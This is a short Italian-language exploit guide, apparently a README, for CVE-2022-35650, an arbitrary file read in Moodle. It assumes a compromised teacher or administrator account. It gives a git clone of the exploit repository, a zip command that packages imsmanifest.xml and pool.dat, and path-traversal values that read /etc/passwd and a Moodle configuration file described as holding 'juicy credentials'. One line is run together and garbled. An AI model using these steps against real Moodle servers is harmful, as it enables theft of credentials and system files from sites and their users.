
Exploit per CVE-2022-35650, una lettura arbitraria di file in Moodle.
Questa è una lettura arbitraria di file in Moodle.
Devi aver compromesso un utente a livello di insegnante o amministratore.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd)/etc/passwdSe vuoi leggere il file di configurazione (con credenziali succose), imposta il tuo baseurl in imsmanifest.xml su questo:
../../../../../../../../../../../var/www/html
e imposta il src dell'img in pool.dat su:
muc/config.php